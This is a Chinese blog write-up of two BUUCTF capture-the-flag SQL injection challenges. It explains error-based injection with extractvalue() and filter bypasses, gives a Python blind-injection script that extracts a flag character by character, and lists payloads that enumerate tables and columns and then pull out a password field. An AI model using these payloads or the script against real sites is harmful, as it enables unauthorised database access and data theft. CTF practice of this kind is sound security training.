BUUCTF 11

最新推荐文章于 2024-05-07 20:39:03 发布
最新推荐文章于 2024-05-07 20:39:03 发布
阅读量192 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52431855/article/details/113096795
版权

知识点

SQL报错注入

extractvalue()

  • extractvalue() :对XML文档进行查询的函数
  • 语法:extractvalue(目标xml文档,xml路径)

  • 第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容

  • 正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

updatexml()

  • updatexml()函数与extractvalue()类似,是更新xml文档的函数。
  • 语法updatexml(目标xml文档,xml路径,更新的内容)

空格过滤:用’^'来连接函数,形成异或

‘=’过滤:用like代替‘=’

left(),right()

语法:LEFT(ARG,LENGTH)、RIGHT(ARG,LENGTH)

 LEFT、RIGHT函数返回ARG最左边、右边的LENGTH个字符串、

11-1[CISCN2019 华北赛区 Day2 Web1]Hack World

做题思路

发现给出了表名和列名,于是尝试盲注

发现过滤了很多字符,便绕过输入

1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1

接着感觉手工盲注太花时间,便想写脚本

由于不会写脚本,于是便找了个WP,采用了大佬的脚本得到flag

import requests
import time

url = "http://f0c8caf0-fc27-454e-83bc-a557d1891b94.node3.buuoj.cn/index.php"
temp = {"id" : ""}
flag = ""
for i in range(1,1000):
    time.sleep(0.06)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        temp["id"] = "1^" + "(ascii(substr((select(flag)from(flag)),%d,1))>%d)^1" %(i,mid)
        r = requests.post(url,data=temp)
        print(low,high,mid,":")
        if "Hello" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)


print("flag=" ,flag)

 

11-2[极客大挑战 2019]HardSQL

做题思路

首先,尝试使用万能密码  并没有得到什么东西

尝试注入 发现order by 和 union 都不行

接下来 不知道该怎么走

然后由WP可知,可以使用 extractvalue和updatexml进行报错注入

然后发现过滤了空格和 and 

尝试用括号代替空格,仍不行,

发现可以 用’^'来连接函数,形成异或

payload: username=44&password=1'^extractvalue(1,concat(0x7e,(select(database()))))%23    爆出库名

接着查询表名

payload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables))))%23

然后查询geek里的表

过滤了等于号,可以用 like代替‘=’

playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

然后查询字段名

playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

获取flag

playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

得到了一部分flag,于是采用left(),right()

playload:username=44&password=1%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

playload:username=44&password=1%27^extractvalue(1,concat(0x7e,(select(right (password,30))from(geek.H4rDsq1))))%23

然后将flag拼接就得到了

小杌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-刷题记录(2020.11.11)
Georgeiweb的博客
11-12 504
Morse 题目: 得到的 flag 请包上 flag{} 提交。 打开文件是: -…/.----/-…/-…/-…/…–/--…/…-/-…/-…/–…/-…/…–/.----/–…/…–/…—/–…/–…/…-/…/…-./–…/…–/…–/-----/…/…-./…–/…–/…–/…-/…–/…/–…/----./–…/-… 解题思路: 看题目可以看出是摩丝密码,然后用在线工具解密 网站是:Morse在线解密 解密出来是:61666374667B317327745F73305F333435797D 然
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1291
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
BUUCTF练习记录10:BUU LFI COURSE 1 1
最新发布
qq_44396970的博客
05-07 389
出现include,这道题为php包含漏洞方面,传递参数file。发现需要传入路径和名称,到根目录下寻找flag,得到答案。
BUU LFI COURSE 11(解题分享)
TinFrog的博客
07-17 360
BUU LFI COURSE 11(解题分享)
REVERSE-PRACTICE-BUUCTF-11
P1umH0的博客
02-26 286
REVERSE-PRACTICE-BUUCTF-11[FlareOn4]IgniteMe[MRCTF2020]Xor[GKCTF2020]BabyDriver[MRCTF2020]hello_world_go [FlareOn4]IgniteMe exe程序,运行后提示输入flag,无壳,ida分析 主逻辑在start函数中,读取输入后check,验证输入成功则输出“G00d j0b!” 分析sub_401050函数,input和v4异或后放入byte_403180,v4有一个初始值,且在循环中不断变化,
BUUCTF——Basic题解
Zichel77的博客
08-17 5627
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF BUU LFI COURSE 1
m0_49025459的博客
04-10 1447
题目 代码 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 直接修改url http://3b1ee075-5de2-4de4-b1e.
BUUCTF(basic)---BUU LFI COURSE 1
ooooohhhhhhh博客
08-01 1074
url后面直接加 /?file=/flag
BUUCTF--[极客大挑战 2020]Roamphp1-Welcome
qq_46263951的博客
07-29 344
进入页面后一片空白,查看源码也啥也没有,蒙蔽中... 看大佬wp说有提示,直接改为post请求即可查看到一段代码 根据源码中的提示,如果我们想要获取更多的信息就要使下面的语句成立 if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){ 若想成立非常简单,因为sha1函数无法处理数组,所以令两个变量都为数组则得出的结果为false===false值为..
第11届极客大挑战writeup
weixin_45883223的博客
11-25 2677
第11届极客大挑战writeupWeb朋友的学妹EZwww刘壮的黑页WelcomeEZgit我是大黑客ezbypassReNo RE no gain我真不会写驱动!WhatsApkHelloAndroidre00mazeMisc一“页”障目壮言壮语秘技·反复横跳来拼图Pwn数学咋样?runcodeliuzhuang-secretbaby_canaryCrypto二战情报员刘壮铠甲与萨满成都养猪二厂规规矩矩的工作babyRSA韡髻猊岈 Web 朋友的学妹 F12,注释,base64解码 EZwww url最后
BUUCTF】[极客大挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 1956
BUUCTF】[极客大挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
BUU LFI COURSE 1
Sk1y的博客
08-23 1512
考察点:文件包含,get传参
buuctf 极客大挑战 lovesql
fightte的博客
05-17 181
界面长这样: 尝试输入1’判断是否有注入漏洞: 这样的报错,可以看出是有的。 输入万能密码进行尝试 1’or 1 =1 #进行尝试: 登录成功,输出了奇怪的字符串,但与密码学无关。 是get型的输入,将网址栏的password进行改变,改为:13‘ 发现出现了和13’有关的报错。 判断是字符型,而不是整型。 尝试在password处使用sql语句进行堆叠注入: 好复杂,暂时放下, 。。。。。。 继续: 尝试使用order by 语句查询字段数: 字段数为3时,应该是存在的,但转到4就不存在了。 ?.
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值